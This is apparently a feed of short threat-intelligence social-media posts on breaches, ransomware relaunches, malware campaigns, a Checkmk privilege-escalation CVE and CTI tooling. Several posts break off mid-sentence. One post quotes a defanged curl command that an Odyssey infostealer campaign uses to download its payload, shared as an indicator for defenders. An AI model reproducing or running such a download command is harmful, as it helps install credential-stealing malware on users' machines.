Why did VirusTotal bump their prices by so much after being integrated into Google Threat Intelligence? I tried to find justifications, but there is on real value-add for 50% of price increase for us. Crazy. We were mostly using the API enrichments.

We recently uncovered how a simple folder permission misconfiguration in the Checkmk Windows agent could be abused for DLL hijacking, leading to full SYSTEM privileges. This case (CVE-2024-28827) shows how small oversights can open the door to major privilege escalation. More

⚠️ Salesloft pulled the plug on Drift after a massive supply-chain hack. Hackers stole its OAuth tokens—then used them to breach Salesforce at Cloudflare, Google Workspace, Palo Alto, Zscaler & 700+ orgs. Full story → thehackernews.com/2025/09/salesl…

David Kasabji Maybe interesting to you, I collaborated with Expel and wrote a long piece about the certificates: expel.com/blog/the-histo… GDATA has related articles too. Aura also has examples of using my db of revoked certs for threat hunting: github.com/SecurityAura/D…

🚨 Weaponized Microsoft Teams Installer to Compromise Systems With Oyster Malware | Read more: cybersecuritynews.com/weaponized-mic… A sophisticated malvertising campaign is using fake Microsoft Teams installers to compromise corporate systems, leveraging poisoned search engine results and

LockBit has relaunched with version 5.0, announced on Ramp Forum on September 3, 2025. This update features a redesigned affiliate panel and enhanced ransomware-as-a-service (RaaS) capabilities, aiming to recover from 2024 law enforcement actions that seized servers and leaked

Data leak detection will have to expand to a new surface, which is LLMs. However, did anyone notice any CTI platform that promotes Credential / Data Leak detection, to offer also LLM-related data leaks? I think this one is a bit tougher to crack, but important today. Maybe some

🚨🚨🚨BREAKING - New data leak site by Scattered LAPSUS$ Hunters exposes Salesforce customers. Dozens of global companies involved in a large-scale extortion campaign. Scattered LAPSUS$ Hunters claims to have breached Salesforce, exfiltrating ~1B records. They accuse Salesforce

Just detected another Odyssey infostealer campaign. This time it uses following URL to download the malware: curl -s http[:]//185.93.89[.]62/d/<victimID> The infection chain seems to start with ClickFix technique as we haven't observed (yet) in the logs anything else suspicious

Most of the community is focused on the PR wording used by major vendors in breach disclosures. However, under the veil, we have to understand that a sophisticated threat actor had prolonged access to the environment (spanning months!) and yet, only "partial" leakage occurred.

I am working on a new feature to automatically add Sightings to MISP attributes upon IOC detection in SOAR incidents. If the indicator is absent in MISP and assessed as malicious, it's added seamlessly to enhance threat intelligence sharing. This streamlines workflows and reduces

Recent reports on the £80M Louvre heist indicate the surveillance system's password was "Louvre" -> a default setting unchanged since 2014. This just shows how unaddressed weak credentials in legacy systems continue to enable breaches, even in high-profile environments. In CTI,